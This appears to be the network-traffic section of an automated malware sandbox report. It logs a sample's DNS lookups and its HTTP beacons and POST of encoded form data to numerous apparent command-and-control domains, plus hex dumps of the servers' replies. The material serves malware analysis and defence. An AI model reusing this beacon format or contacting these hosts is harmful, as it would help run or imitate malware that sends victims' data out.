                Source: global traffic | HTTP traffic detected: GET /p75v/?OvV=2njD6f80EDOLQ8&wz4=GLmvlUrKOeNEevY3wcyfjSkNrwRDbMR2/x32zMvR34mmT0X9ObY05SVA9W4yUMrr2Yq11ERvKU6w2wYb4X7EbFt4LfTn3Wu5NGMirqATx7GUx0yxlSOAJso= HTTP/1.1 | Host: www.wddb97.top | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                Source: global traffic | HTTP traffic detected: GET /ro4w/?wz4=c7bs7cBJE/6WeNDz6y7wfs4csA5ai8mWfunIFb5NDUjHoY3en1z9O1W0OakyKWwaCum+/W1z6qbtx3tl+iJ0V9nyUJg4fcAQQsDkMDUAlXZwvkRINEDVO9c=&OvV=2njD6f80EDOLQ8 HTTP/1.1 | Host: www.nexula.website | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                Source: global traffic | HTTP traffic detected: GET /rpjd/?wz4=yOJpbVbkgz0HtUwQYARMSThcLcopmrPoDVX6GqNwoWWXZF3pcIj1Y13LV6gW4nMVJ2J858d+IDhJ+laaNqfHK1c6MutgW040XFAhxno1AdPNbACR1ywEbhk=&OvV=2njD6f80EDOLQ8 HTTP/1.1 | Host: www.prediksipreman.fyi | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                Source: global traffic | HTTP traffic detected: GET /qjug/?wz4=VcMkcuIRceq81+g9yOCv0sbld0olDHkRvlNhYh95NOpnwjcC/r1DFPFDhAQ/BZSpNAD5Fbv04pxr6m2h9PMUHq+9H+1HT0zuQhfUSGVBQeWRfQVA8fdlyIU=&OvV=2njD6f80EDOLQ8 HTTP/1.1 | Host: www.scottconsults.top | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                Source: global traffic | HTTP traffic detected: GET /dim8/?wz4=SI5ZCVgJbtC8ikIAaDbl0c4+a+swA4Oej6uVn92gSwZctgLMHnh4qXUXZe4N7Wh4DCFNfNClZUM8FDTYBsBE5loeshCr6I6FGtX7Gz1ZeQkIvaXZY4DJTLc=&OvV=2njD6f80EDOLQ8 HTTP/1.1 | Host: www.2q33e.top | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                Source: global traffic | HTTP traffic detected: GET /yysf/?OvV=2njD6f80EDOLQ8&wz4=587F8uRRvdNyXp392stmA/LSb7Spi8c8LmJfnRupxm2/Wn33qNRES9K4qtAStdZkGkX6B9loQ5/VkD04mezEqEUp6fJ/QFk+OhJrfgesanG1zCyT/BctW7c= HTTP/1.1 | Host: www.7wkto5nk230724z.click | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                Source: global traffic | HTTP traffic detected: GET /otgv/?wz4=mPj2soEUEFmq5Xu56Ev9ENs/GIe87AemMTFSPosGtz7M/tXNad3AOcc3teRO2drll+qYOuNJorQ/HJUWSqoYkO/lFhsMOlB8p4kTaBK5nEPe9NarMUavWdI=&OvV=2njD6f80EDOLQ8 HTTP/1.1 | Host: www.livingslab.net | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                Source: global traffic | HTTP traffic detected: GET /rdfj/?wz4=W22N1n9VK5BsDegKssi59d1tdmClQzQM6krhrjkO5qQUOhZ23fqPP0igRbfRb/LgqczUnn1NrDdL/bN6nwlekL5Do//GTuaTPhPlYdtLOoB+gLN1EC4FlrA=&OvV=2njD6f80EDOLQ8 HTTP/1.1 | Host: www.quickcommerce.cloud | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                Source: global traffic | HTTP traffic detected: GET /8vp1/?wz4=/LTgXn1km3iwlVyiegwnGjWZZFB0eLisfcmkyyqxOnWJ8H9CeAgPjsH/KIvj3CyMdhcMqJeWq/63o3TMWNYzsf+ek40CYofT8u9WJYZhwl3Hq5liXp4GPpE=&OvV=2njD6f80EDOLQ8 HTTP/1.1 | Host: www.xpremio.online | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                Source: global traffic | DNS traffic detected: DNS query: www.thesquare.world
                Source: global traffic | DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                Source: global traffic | DNS traffic detected: DNS query: www.revolutionmusic.net
                Source: global traffic | DNS traffic detected: DNS query: www.wddb97.top
                Source: global traffic | DNS traffic detected: DNS query: www.nexula.website
                Source: global traffic | DNS traffic detected: DNS query: www.prediksipreman.fyi
                Source: global traffic | DNS traffic detected: DNS query: www.scottconsults.top
                Source: global traffic | DNS traffic detected: DNS query: www.xtelify.tech
                Source: global traffic | DNS traffic detected: DNS query: www.2q33e.top
                Source: global traffic | DNS traffic detected: DNS query: www.7wkto5nk230724z.click
                Source: global traffic | DNS traffic detected: DNS query: www.livingslab.net
                Source: global traffic | DNS traffic detected: DNS query: www.quickcommerce.cloud
                Source: global traffic | DNS traffic detected: DNS query: www.cybermisha.store
                Source: global traffic | DNS traffic detected: DNS query: www.xpremio.online
                Source: unknownHTTP traffic detected: POST /p75v/ HTTP/1.1Host: www.wddb97.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.wddb97.topReferer: http://www.wddb97.top/p75v/Cache-Control: no-cacheConnection: closeContent-Length: 200Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like GeckoData Raw: 77 7a 34 3d 4c 4a 4f 50 6d 69 4b 66 54 65 49 42 4d 75 74 42 7a 76 7a 46 72 68 49 79 71 51 77 62 52 4f 74 6a 6b 7a 54 52 76 2b 50 44 34 49 43 4c 57 31 6e 35 4b 4c 78 48 37 68 34 66 31 56 64 51 52 62 62 2b 78 65 32 53 74 58 64 38 64 68 61 41 77 46 6f 56 2f 32 7a 6d 54 46 52 6f 48 38 61 58 6b 6b 65 37 4d 33 34 37 69 71 35 63 72 72 2b 54 31 58 79 44 6d 53 6d 79 64 73 35 58 66 41 70 79 6d 4b 4b 70 62 71 30 30 79 77 6b 49 73 6d 4a 48 45 6e 70 77 59 71 61 75 76 47 73 4c 50 52 31 74 59 71 73 37 66 4e 75 6d 41 61 35 74 50 39 79 2f 78 4c 6e 39 73 78 61 37 62 70 72 32 67 50 38 6e 2b 47 53 6c 46 67 3d 3d Data Ascii: wz4=LJOPmiKfTeIBMutBzvzFrhIyqQwbROtjkzTRv+PD4ICLW1n5KLxH7h4f1VdQRbb+xe2StXd8dhaAwFoV/2zmTFRoH8aXkke7M347iq5crr+T1XyDmSmyds5XfApymKKpbq00ywkIsmJHEnpwYqauvGsLPR1tYqs7fNumAa5tP9y/xLn9sxa7bpr2gP8n+GSlFg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 14 Jan 2025 09:24:53 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 14 Jan 2025 09:24:56 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 14 Jan 2025 09:24:58 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 14 Jan 2025 09:25:01 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3a46-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 09:25:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 09:25:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 09:25:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 09:25:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Tue, 14 Jan 2025 09:25:20 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 07 d1 db 3d bb ba 21 09 90 90 04 02 84 c3 71 42 e8 8e ae e8 0e 1b 7e 20 bf 86 9f cc 25 ba 7b 9a 66 ba cf cc 3a fc c3 35 3f 1a d5 25 2b 2b f3 cb cc 9a cc fa ed b7 df 1e ff 89 5b b0 2b 53 e5 07 41 95 c4 df 7e 7b 7c fe 33 00 ed 31 70 2d e7 db 6f 97 9f 89 5b 59 60 46 95 df bb c7 3a 6c 9e ee d8 2c ad dc b4 ba af 4e b9 7b 37 b0 9f bf 9e ee 2a b7 ab e0 9e c4 5f 06 76 60 15 a5 5b 3d d5 95 77 4f dd 7d 4a c7 b2 03 f7 be 5f 5f 64 f1 15 a1 34 bb b7 fb a1 4f 17 aa 85 e5 27 d6 3f b2 82 ef f2 b0 70 cb ab 25 c8 3b ea a9 95 b8 4f 77 4d e8 b6 79 56 54 57 d3 da d0 a9 82 27 c7 6d 42 db bd bf 7c 7c 19 84 69 58 85 56 7c 5f da 56 ec 3e a1 5f bf 93 aa c2 2a 76 bf 11 08 31 50 b2 6a 30 c9 ea d4 79 84 9f 3b 9f 45 59 56 a7 d8 1d f4 72 7b 11 97 5d 96 2f 7c f4 a2 de 67 ce 69 f0 f7 cb d4 fe b3 6f 1e 90 ce bd 67 25 61 7c 7a 18 d0 05 d8 f6 cb 40 74 e3 c6 ad 42 db fa 32 28 ad b4 bc 2f dd 22 f4 fe f2 e3 b2 32 3c bb 0f 03 94 c8 bb f7 83 71 98 ba f7 81 1b fa 41 05 86 bf 12 18 45 8e 50 02 1b bf 9f b5 b7 ec c8 2f fa 33 00 15 c5 59 f1 30 f8 67 ef d2 de 4f 7b 1d c3 26 38 86 23 ef c7 72 cb 71 c2 d4 7f 18 dc f4 27 56 e1 87 e9 bb ee ff fc ce 7e e9 da 55 98 a5 5f c0 d1 b3 ca 2d 6e e4 e1 84 65 1e 5b 40 16 fb 38 b3 a3 ff 83 ed be f6 f8 b3 80 44 6e 77 7a 66 f2 3e 76 3d 20 25 ab ae b2 f7 9b bd 0c 17 cf 52 fc 71 fc ed ec 03 14 b9 d6 c0 db 49 bf 02 44 e6 59 5a ba f7 61 ea 65 37 07 7d 95 2b 7b 69 6f 7b 5f 2d 2f 2b ab aa 4b a0 1d c7 bd 59 7c 41 cd b3 fa 49 04 f9 97 3f 5a 5d b8 56 99 a5 9f af c7 c8 eb f5 3d 24 3f 53 c1 15 67 17 99 da d5 e5 5c 5f be 6b 16 9c b7 df eb be 77 14 37 1b be 9e 16 b9 b4 0f f9 ed b1 d4 
03 03 18 de 07 e2 ba 42 6b e1 e6 ae 05 74 06 dc c8 f3 cf 37 72 3d fb 57 33 5f 77 c5 c6 38 4d d0 ef a7 bd 8e 4d 2e ed 6d ec ea 94 b7 1c 59 9f 1c ea d7 49 dc 87 95 9b 94 37 64 be 23 09 03 38 fa c1 94 c2 f4 cd 94 c7 f8 27 40 bb d6 c7 0d f5 17 1c ef b3 aa ca 92 87 41 bf c7 db 61 7b 79 5d 61 09 1d 5e 0f 5e 49 e2 1d fd 5b 31 f4 ea be 77 5c 3b 2b ac 5e 7f 0f 03 e0 52 dc a2 77 42 ef 37 7a 95 38 f0 47 0c 7b a5 8d 4f f7 79 08 b2 c6 2d ae f0 f5 9e 8d 07 2f b3 eb f2 f3 61 0b f8 99 e6 d6 72 5e 99 c0 e8 21 31 1e be 31 78 c5 c4 e7 28 7e f5 6b 1f 29 ea 17 c4 58 c7 37 ba f9 6e 69 61 7a f1 d9 1f f8 bc 38 2c ab fb 4b 58 e9 01 9f ba 83 ac ae ca 10 38 84 fe e3 8d fd 5e 91 af dc dd 38 e3 ef f0 ba ea 7f 3b 2d e0 29 0e 6f d8 f2 e2 ac b7 af de 33 be df e1 a2 69 2b 0e 7d a0 64 1b dc 10 dc e2 6d fc 8d e4 d7 1b bb 79 01 fd 47 3b 5d 02 2e 88 51 9f f9 b0 de 11 dc 87 89 e5 df aa f1 fb a1 3e f5 bd 97 a5 fd 2d 07 04 a8 db f3 f5 31 b7 7d 89 8f fb 2c 76 de 4e d1 cb f1 fa 94 3f ca a0 cd 0a e7 7e 0f 30 12 81 18 d5 ff b9 b7 e2 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Tue, 14 Jan 2025 09:25:22 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 07 d1 db 3d bb ba 21 09 90 90 04 02 84 c3 71 42 e8 8e ae e8 0e 1b 7e 20 bf 86 9f cc 25 ba 7b 9a 66 ba cf cc 3a fc c3 35 3f 1a d5 25 2b 2b f3 cb cc 9a cc fa ed b7 df 1e ff 89 5b b0 2b 53 e5 07 41 95 c4 df 7e 7b 7c fe 33 00 ed 31 70 2d e7 db 6f 97 9f 89 5b 59 60 46 95 df bb c7 3a 6c 9e ee d8 2c ad dc b4 ba af 4e b9 7b 37 b0 9f bf 9e ee 2a b7 ab e0 9e c4 5f 06 76 60 15 a5 5b 3d d5 95 77 4f dd 7d 4a c7 b2 03 f7 be 5f 5f 64 f1 15 a1 34 bb b7 fb a1 4f 17 aa 85 e5 27 d6 3f b2 82 ef f2 b0 70 cb ab 25 c8 3b ea a9 95 b8 4f 77 4d e8 b6 79 56 54 57 d3 da d0 a9 82 27 c7 6d 42 db bd bf 7c 7c 19 84 69 58 85 56 7c 5f da 56 ec 3e a1 5f bf 93 aa c2 2a 76 bf 11 08 31 50 b2 6a 30 c9 ea d4 79 84 9f 3b 9f 45 59 56 a7 d8 1d f4 72 7b 11 97 5d 96 2f 7c f4 a2 de 67 ce 69 f0 f7 cb d4 fe b3 6f 1e 90 ce bd 67 25 61 7c 7a 18 d0 05 d8 f6 cb 40 74 e3 c6 ad 42 db fa 32 28 ad b4 bc 2f dd 22 f4 fe f2 e3 b2 32 3c bb 0f 03 94 c8 bb f7 83 71 98 ba f7 81 1b fa 41 05 86 bf 12 18 45 8e 50 02 1b bf 9f b5 b7 ec c8 2f fa 33 00 15 c5 59 f1 30 f8 67 ef d2 de 4f 7b 1d c3 26 38 86 23 ef c7 72 cb 71 c2 d4 7f 18 dc f4 27 56 e1 87 e9 bb ee ff fc ce 7e e9 da 55 98 a5 5f c0 d1 b3 ca 2d 6e e4 e1 84 65 1e 5b 40 16 fb 38 b3 a3 ff 83 ed be f6 f8 b3 80 44 6e 77 7a 66 f2 3e 76 3d 20 25 ab ae b2 f7 9b bd 0c 17 cf 52 fc 71 fc ed ec 03 14 b9 d6 c0 db 49 bf 02 44 e6 59 5a ba f7 61 ea 65 37 07 7d 95 2b 7b 69 6f 7b 5f 2d 2f 2b ab aa 4b a0 1d c7 bd 59 7c 41 cd b3 fa 49 04 f9 97 3f 5a 5d b8 56 99 a5 9f af c7 c8 eb f5 3d 24 3f 53 c1 15 67 17 99 da d5 e5 5c 5f be 6b 16 9c b7 df eb be 77 14 37 1b be 9e 16 b9 b4 0f 